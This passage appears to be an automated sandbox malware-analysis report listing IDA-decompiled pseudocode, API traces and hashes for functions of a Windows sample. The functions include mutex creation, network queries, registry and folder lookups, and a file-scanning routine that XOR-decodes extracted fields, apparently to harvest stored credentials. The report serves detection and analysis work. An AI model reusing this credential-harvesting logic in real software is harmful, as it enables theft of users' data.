              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220823,?,00000000,?,19367401,00000001), ref: 00404866
            • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367401,00000001), ref: 004048A0
            • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367401,00000001), ref: 004048D6
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
            • String ID:
            • API String ID: 123286213-0
            • Opcode ID: cd85183662a0335e7b9dcb6e1f5c4870e11d88af898ec28910f3ba5ff69ffd86
            • Instruction ID: 69c85ff8c01682c76bd3770529f4c55df87910b7ab93001c803deedc4962b8b8
            • Opcode Fuzzy Hash: cd85183662a0335e7b9dcb6e1f5c4870e11d88af898ec28910f3ba5ff69ffd86
            • Instruction Fuzzy Hash: 4D21C272900208AEEB00ABA0DD45FEE7BACEB44304F104476F600F71A1D6749F418B98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004137A3 Relevance: 7.6, APIs: 5, Instructions: 65networkCOMMON
            Download Yara Rule
            APIs
            • socket.WS2_32(?,00000002,00000000), ref: 004137B5
            • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 004137DF
            • WSAGetLastError.WS2_32 ref: 004137E6
              • Part of subcall function 004103ED: HeapAlloc.KERNEL32(00000008,-00000004,00411BB4,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 004103F9
            • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00413818
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • closesocket.WS2_32(?), ref: 0041382C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: HeapIoctl$AllocErrorFreeLastclosesocketsocket
            • String ID:
            • API String ID: 3987134166-0
            • Opcode ID: 33823560d36c58e50ee98f791afc713ae9c656990d0fb403b54b390940bbac45
            • Instruction ID: 892aa742d0e1123e955588173a65afe0ba912d105ff12f8762b9abc2eed0dad7
            • Opcode Fuzzy Hash: 33823560d36c58e50ee98f791afc713ae9c656990d0fb403b54b390940bbac45
            • Instruction Fuzzy Hash: 9B111675801128BADB10AFA5DD48CDFBFACEF053A4B204126F905A21A0D2349F90DAE4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407E64 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E00407E64(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v60;
				char _v84;
				char _v124;
				short _v644;
				short _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t29;
				void* _t31;
				void* _t36;
				void* _t38;
				void* _t42;
				WCHAR* _t45;
				void* _t55;
				char* _t64;
				signed int _t65;
				void* _t66;
				intOrPtr _t74;

				_t58 = __edx;
				_t55 = __ecx;
				E004104CB( &_v12,  &_v12, 0, 8);
				_t29 = 0x37;
				E0040F369(_t29,  &_v124);
				_t31 = 0x38;
				E0040F369(_t31,  &_v60);
				_t36 = E004143B6(0x80000002, 0x104, _t55,  &_v644,  &_v124,  &_v60);
				if(_t36 != 0xffffffff) {
					_t69 = _t36;
					if(_t36 > 0) {
						ExpandEnvironmentStringsW( &_v644,  &_v1164, 0x104);
						E00407C02(_t69,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t74 > 0) {
						_t63 =  &_v36;
						_t38 = 0x3a;
						E0040F369(_t38,  &_v36);
						E0040D929( &_v36, _v12, _t58, _t74, _t63);
					}
					return E00410418(_v12);
				} else {
					_t64 =  &_v84;
					_t42 = 0x39;
					E0040F369(_t42, _t64);
					_v32 = 0x23;
					_v28 = 0x1a;
					_v24 = 0x26;
					_v16 = _t64;
					_t65 = 0;
					do {
						_t45 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t66 + _t65 * 4 - 0x1c)), 0, 0, _t45);
						_t72 = _t45;
						if(_t45 == 0) {
							_t58 =  &_v16;
							E00415BE8( &_v644,  &_v16, _t72, 1, 2, E00407C5C,  &_v12, 0, 0, 0);
						}
						_t65 = _t65 + 1;
					} while (_t65 < 3);
					_t74 = _v8;
					goto L9;
				}
			}





























            0x00407e64
            0x00407e64
            0x00407e78
            0x00407e82
            0x00407e83
            0x00407e8d
            0x00407e8e
            0x00407eaa
            0x00407eb4
            0x00407eb6
            0x00407eb8
            0x00407ec9
            0x00407eda
            0x00407eda
            0x00407eb8
            0x00407ee2
            0x00407f4a
            0x00407f4a
            0x00407f4e
            0x00407f51
            0x00407f52
            0x00407f5d
            0x00407f5d
            0x00407f6e
            0x00407ee4
            0x00407ee6
            0x00407ee9
            0x00407eea
            0x00407ef1
            0x00407ef8
            0x00407eff
            0x00407f06
            0x00407f09
            0x00407f0b
            0x00407f0b
            0x00407f19
            0x00407f1f
            0x00407f21
            0x00407f33
            0x00407f3c
            0x00407f3c
            0x00407f41
            0x00407f42
            0x00407f47
            0x00000000
            0x00407f47

            APIs
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000003,00000000,00000008,?,?,00000001), ref: 00407EC9
            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000003,00000000,00000008,?,?,00000001), ref: 00407F19
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: EnvironmentExpandFolderOpenPathStrings
            • String ID: #$&
            • API String ID: 1994525040-3870246384
            • Opcode ID: fb1cd3abc6a2bd8735100927dcc8fe0c699b6b8511f12d815fc4a792fb0fa9ac
            • Instruction ID: f5d78b5172c31fa2cc344c482bc0a77cf1a96e70773fbc14be6c3ad2750dce8c
            • Opcode Fuzzy Hash: fb1cd3abc6a2bd8735100927dcc8fe0c699b6b8511f12d815fc4a792fb0fa9ac
            • Instruction Fuzzy Hash: E3318F72E04218AADF21EBE1DC49EDE777CEB44714F10846AF605F3180DA786A898B95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408748 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E00408748(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v48;
				char _v72;
				char _v124;
				short _v644;
				short _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t29;
				void* _t31;
				void* _t36;
				void* _t38;
				void* _t42;
				WCHAR* _t45;
				void* _t55;
				char* _t64;
				signed int _t65;
				void* _t66;
				intOrPtr _t74;

				_t58 = __edx;
				_t55 = __ecx;
				E004104CB( &_v12,  &_v12, 0, 8);
				_t29 = 0x4e;
				E0040F369(_t29,  &_v124);
				_t31 = 0x4f;
				E0040F369(_t31,  &_v48);
				_t36 = E004143B6(0x80000001, 0x104, _t55,  &_v644,  &_v124,  &_v48);
				if(_t36 != 0xffffffff) {
					_t69 = _t36;
					if(_t36 > 0) {
						ExpandEnvironmentStringsW( &_v644,  &_v1164, 0x104);
						E004084D7(_t69,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t74 > 0) {
						_t63 =  &_v32;
						_t38 = 0x51;
						E0040F369(_t38,  &_v32);
						E0040D929( &_v32, _v12, _t58, _t74, _t63);
					}
					return E00410418(_v12);
				} else {
					_t64 =  &_v72;
					_t42 = 0x50;
					E0040F369(_t42, _t64);
					_v32 = 0x1a;
					_v28 = 0x26;
					_v24 = 0x23;
					_v16 = _t64;
					_t65 = 0;
					do {
						_t45 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t66 + _t65 * 4 - 0x1c)), 0, 0, _t45);
						_t72 = _t45;
						if(_t45 == 0) {
							_t58 =  &_v16;
							E00415BE8( &_v644,  &_v16, _t72, 1, 2, E0040850F,  &_v12, 0, 0, 0);
						}
						_t65 = _t65 + 1;
					} while (_t65 < 3);
					_t74 = _v8;
					goto L9;
				}
			}




























            0x00408748
            0x00408748
            0x0040875c
            0x00408766
            0x00408767
            0x00408771
            0x00408772
            0x0040878e
            0x00408798
            0x0040879a
            0x0040879c
            0x004087ad
            0x004087be
            0x004087be
            0x0040879c
            0x004087c6
            0x0040882e
            0x0040882e
            0x00408832
            0x00408835
            0x00408836
            0x00408841
            0x00408841
            0x00408852
            0x004087c8
            0x004087ca
            0x004087cd
            0x004087ce
            0x004087d5
            0x004087dc
            0x004087e3
            0x004087ea
            0x004087ed
            0x004087ef
            0x004087ef
            0x004087fd
            0x00408803
            0x00408805
            0x00408817
            0x00408820
            0x00408820
            0x00408825
            0x00408826
            0x0040882b
            0x00000000
            0x0040882b

            APIs
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000003,00000000,00000008,?,?,00000001), ref: 004087AD
            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000003,00000000,00000008,?,?,00000001), ref: 004087FD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: EnvironmentExpandFolderOpenPathStrings
            • String ID: #$&
            • API String ID: 1994525040-3870246384
            • Opcode ID: 532419b0cfec5ed70d14e4089e73b01c5c4489069dd3c3cf0f3d71c96ff3f43a
            • Instruction ID: 7cb8742c9ca09a8ff5568783c70821ef80f094f4785c990d3721d78182314cd1
            • Opcode Fuzzy Hash: 532419b0cfec5ed70d14e4089e73b01c5c4489069dd3c3cf0f3d71c96ff3f43a
            • Instruction Fuzzy Hash: 82316E72D00218AADF20EAA19D49FDFB77CEB44714F10847AF604F3181DA785A898BA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00415AC4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00415AC4(WCHAR* _a4) {
				signed short _t4;
				short _t9;
				signed int _t10;
				WCHAR* _t11;
				WCHAR* _t13;
				int _t19;

				_t13 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t13);
				if(_t11 == 0) {
					_t11 = _t13;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4 & 0x0000ffff;
					 *_t11 = 0;
					if(GetFileAttributesW(_t13) == 0xffffffff) {
						_t19 = CreateDirectoryW(_t13, 0);
					}
					if(_t19 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}









            0x00415ac6
            0x00415acd
            0x00415ad5
            0x00415ad9
            0x00415adb
            0x00415adb
            0x00415add
            0x00415add
            0x00415ae4
            0x00000000
            0x00000000
            0x00415b1e
            0x00415b1f
            0x00000000
            0x00415af1
            0x00415af1
            0x00415af7
            0x00415b03
            0x00415b0e
            0x00415b0e
            0x00415b14
            0x00415b27
            0x00415b2a
            0x00415b16
            0x00415b19
            0x00415b22
            0x00000000
            0x00415b22
            0x00415b1b
            0x00000000
            0x00415b1b
            0x00415b14

            APIs
            • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,004059B1,?,?,?,?,?,00000000,?,00000017,?,00000000), ref: 00415ACF
            • GetFileAttributesW.KERNEL32(?,?,00000000,004059B1,?,?,?,?,?,00000000,?,00000017,?,00000000,00000000,00000002), ref: 00415AFA
            • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,004059B1,?,?,?,?,?,00000000,?,00000017,?,00000000,00000000), ref: 00415B08
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AttributesCreateDirectoryFilePathRootSkip
            • String ID: .exe
            • API String ID: 4231520044-4119554291
            • Opcode ID: 5f4843266c44a810852a767538cf0336d61564938a3391df69adeed481feb075
            • Instruction ID: 19ef5d6567273b6890ed45b4c484af55532722c0e5b248279dc5de7e5d4c7a03
            • Opcode Fuzzy Hash: 5f4843266c44a810852a767538cf0336d61564938a3391df69adeed481feb075
            • Instruction Fuzzy Hash: 51F0FC35184625DBC6301A296C447F7B798DE817E07954627FDD197360D7387CC2927C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040CD7B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040CD7B(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x41aa80 == 0) {
					E00403ED1(__ecx, 0x41aa80, 2);
					 *((short*)(E00410454(0x41ac88, 0x41aa80, E00411098(0x41aa80) + _t10) + 0x41ac88)) = 0;
					_t3 = PathRemoveFileSpecW(0x41ac88);
				}
				if(_t13 != 0) {
					E004107C1(_t3 | 0xffffffff, 0x41aa80, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x41a4fc > 1) {
					E00415AC4(0x41ac88);
					E00413904(0x41ac88);
					_t3 = GetFileAttributesW(0x41aa80);
					if(_t3 != 0xffffffff) {
						return E00413904(0x41aa80);
					}
				}
				return _t3;
			}






            0x0040cd7b
            0x0040cd8f
            0x0040cd93
            0x0040cdac
            0x0040cdb3
            0x0040cdb3
            0x0040cdbb
            0x0040cdc4
            0x0040cdcf
            0x0040cdcf
            0x0040cdda
            0x0040cde6
            0x0040cdec
            0x0040cdf2
            0x0040cdfb
            0x00000000
            0x0040cdfe
            0x0040cdfb
            0x0040ce05

            APIs
            • PathRemoveFileSpecW.SHLWAPI(0041AC88,0041AC88,0041AA80,00000000,00000002,00000000,00020000,0040D856,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722), ref: 0040CDB3
            • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,0040D856,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 0040CDCF
            • GetFileAttributesW.KERNEL32(0041AA80,0041AC88,0041AC88,00000000,00020000,0040D856,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 0040CDF2
              • Part of subcall function 00403ED1: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041A2F0,00000000,00000032,?,774B9EB0,00000000), ref: 00403F4A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
            • String ID: .tmp
            • API String ID: 3627892477-2986845003
            • Opcode ID: 437ff8529e8adc2a2313f7dba550cd0a4688e97ce315d8cdc2935d85ae9108d4
            • Instruction ID: ff4a0e6cf7770cbb46ffb1399c1cc435dff76c605b5ccefbc27db7cba67aef21
            • Opcode Fuzzy Hash: 437ff8529e8adc2a2313f7dba550cd0a4688e97ce315d8cdc2935d85ae9108d4
            • Instruction Fuzzy Hash: F0F0D670A4115066E3113736ACC9AFF2A5D4F82329B18427FF111B51F1DBBC49D686EE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00415981 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			E00415981(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E00411812());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E004111A5(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E00415D45(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}









            0x004159a4
            0x004159fa
            0x00000000
            0x004159fa
            0x004159a6
            0x004159a8
            0x004159ad
            0x004159ae
            0x004159bd
            0x004159c3
            0x004159c8
            0x004159ce
            0x00000000
            0x00000000
            0x004159e3
            0x004159f4
            0x004159f8
            0x00000000
            0x00000000
            0x00000000
            0x00415a02
            0x00000000
            0x00415a02
            0x004159e3
            0x00000000

            APIs
            • GetTempPathW.KERNEL32(000000F6,?,00000000,?), ref: 00415998
              • Part of subcall function 00411812: GetTickCount.KERNEL32 ref: 00411812
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 004159EA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Path$CombineCountCreateDirectoryTempTick
            • String ID: %s%08x$tmp
            • API String ID: 1218007593-1196434543
            • Opcode ID: 4cd818f440a9816f39389b82fda7f1bfd9b68499b0f0f8bb2723b25885b9daa6
            • Instruction ID: 66161d0e6316a1f645c538f4e73e369e1521aab0bc427a269a70e6073044d410
            • Opcode Fuzzy Hash: 4cd818f440a9816f39389b82fda7f1bfd9b68499b0f0f8bb2723b25885b9daa6
            • Instruction Fuzzy Hash: F4F07DB2200614E6DA202B14DC05BEF7B5CCB81724F104233FE15FA1E1D67C9EC6869E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00411C1D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00411C1D(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}





            0x00411c21
            0x00411c2a
            0x00411c32
            0x00411c54
            0x00411c5c
            0x00411c34
            0x00411c3a
            0x00411c42
            0x00000000
            0x00411c44
            0x00411c4a
            0x00411c4e
            0x00000000
            0x00411c50
            0x00411c53
            0x00411c53
            0x00411c4e
            0x00411c42

            APIs
            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,004036ED,00000000,00403AF4), ref: 00411C2A
            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00411C3A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: IsWow64Process$kernel32.dll
            • API String ID: 1646373207-3024904723
            • Opcode ID: b0f4205cafa3be70abea1d5b954419b691e7c28adc2e7b262e1e1aed0168d355
            • Instruction ID: 1c4824f158137962995ed49fa72eecf5ee8bc92daaa8de0918b71470d24403ed
            • Opcode Fuzzy Hash: b0f4205cafa3be70abea1d5b954419b691e7c28adc2e7b262e1e1aed0168d355
            • Instruction Fuzzy Hash: E5E04830350205B6DF444BA18D06BDBB7EC5B05B99F140265E112F51D0FA7CDB489568
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040C3DA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040C3DA(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;
				intOrPtr _t9;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x41aa60);
					_t7 = E0040BDA6(_a4);
					if(_t7 != 0xffffffff) {
						_t9 =  *0x41aa78; // 0x0
						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
					}
					LeaveCriticalSection(0x41aa60);
					return _t7;
				}
				return _t6;
			}







            0x0040c3df
            0x0040c3f0
            0x0040c3fa
            0x0040c402
            0x0040c404
            0x0040c411
            0x0040c411
            0x0040c418
            0x00000000
            0x0040c41f
            0x0040c420

            APIs
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C3F0
            • SetEvent.KERNEL32(?), ref: 0040C411
            • LeaveCriticalSection.KERNEL32(0041AA60), ref: 0040C418
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$EnterEventLeave
            • String ID: 3
            • API String ID: 3094578987-1842515611
            • Opcode ID: 6c8104d50b8c54ba577f17cbf2393710e1a04754efc8851b89e7cd51192aa2b0
            • Instruction ID: b8a8e98652e51eefab459ab17ec87f12440760544f39ffcb702e9268e7f67414
            • Opcode Fuzzy Hash: 6c8104d50b8c54ba577f17cbf2393710e1a04754efc8851b89e7cd51192aa2b0
            • Instruction Fuzzy Hash: A0E06D31100100EBC7119B25A98886ABB64EED6336704C63FF419B21B0C7388891CB1A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004091AC Relevance: 6.5, APIs: 5, Instructions: 206memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E004091AC(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t75;
				char* _t76;
				intOrPtr _t78;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t86;
				void* _t88;
				char** _t94;
				char* _t105;
				char* _t111;
				char* _t112;
				void* _t113;
				char* _t116;
				char* _t117;
				void* _t121;
				char* _t149;
				void* _t150;
				signed int _t160;
				char* _t161;
				char** _t162;
				intOrPtr _t164;
				char* _t165;
				signed int _t166;
				void* _t168;

				_t168 = (_t166 & 0xfffffff8) - 0x294;
				if(E00415D45( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t171 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t75 = 2;
					_t76 = E00415750(_t75,  &_v524,  &_v612);
					__eflags = _t76;
					if(_t76 == 0) {
						goto L31;
					}
					_t78 = E00410D04(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t78;
					__eflags = _t78 - 0xffffffff;
					if(_t78 == 0xffffffff) {
						L30:
						E004157F8( &_v612);
						goto L31;
					}
					_t81 = HeapAlloc( *0x41bc68, 8, 0x626);
					_v640 = _t81;
					_t82 = 0x68;
					E0040F333(_t82,  &_v588);
					_t84 = 0x69;
					E0040F333(_t84,  &_v628);
					_t86 = 0x6a;
					E0040F333(_t86,  &_v620);
					_t88 = 0x6b;
					E0040F333(_t88,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E00410418(_v640);
						E00410434(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t160 = _v644 << 2;
							_t94 = _v652 + _t160;
							__eflags =  *_t94;
							if( *_t94 == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *_t94,  &_v588);
							_t149 = StrStrIA( *(_t160 + _v656),  &_v632);
							_v668 = StrStrIA( *(_t160 + _v660),  &_v628);
							_t105 = StrStrIA( *(_t160 + _v664),  &_v588);
							__eflags = _v676;
							_t161 = _t105;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t161;
							if(_t161 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t162 =  &(_t161[0xa]);
							_v652 = _t162;
							E00409184(_v676);
							E00409184(_v672);
							E00409184(_t162);
							__eflags = _t149;
							if(_t149 == 0) {
								L15:
								_t150 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t111 =  *_t162;
								__eflags = _t111;
								if(_t111 == 0) {
									goto L28;
								}
								__eflags = _t111 - 0x30;
								if(_t111 == 0x30) {
									L21:
									__eflags = _t162[0];
									if(_t162[0] == 0) {
										goto L28;
									}
									L22:
									_t112 = 0;
									__eflags =  *_t162;
									if( *_t162 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t112[_t162] = _t112[_t162] ^ 0x00000019;
										_t112 =  &(_t112[1]);
										__eflags = _t112[_t162];
									} while (_t112[_t162] != 0);
									__eflags = _t112;
									if(_t112 > 0) {
										_t163 =  &_v580;
										_t113 = 0x2e;
										E0040F369(_t113,  &_v580);
										_push(_t150);
										_push(_v676);
										_t151 = _v656;
										_push(_v652);
										_push(_v672);
										_t116 = E004111A5(_t163, 0x311, _v656, _t163);
										_t168 = _t168 + 0x14;
										__eflags = _t116;
										if(_t116 > 0) {
											_t164 = _a4;
											_t117 = E00410818(_t116, _t164, _t151);
											__eflags = _t117;
											if(_t117 != 0) {
												_t61 = _t164 + 4;
												 *_t61 =  &(( *(_t164 + 4))[1]);
												__eflags =  *_t61;
											}
										}
									}
									goto L28;
								}
								__eflags = _t111 - 0x31;
								if(_t111 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_t152 =  &(_t149[6]);
							_v648 =  &(_t149[6]);
							E00409184(_t152);
							_t150 = E00410ABC(_v648, _t152, 0);
							__eflags = _t150 - 1;
							if(_t150 < 1) {
								goto L15;
							}
							__eflags = _t150 - 0xffff;
							if(_t150 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t165 =  &_v612;
					_t121 = 0x67;
					E0040F369(_t121, _t165);
					_v648 = _t165;
					E00415BE8( &_v524,  &_v648, _t171, 1, 5, E004091AC, _a4, 0, 0, 0);
					goto L31;
				}
			}

















































            0x004091b2
            0x004091d0
            0x00409432
            0x0040943a
            0x0040943a
            0x004091d6
            0x004091d9
            0x0040921a
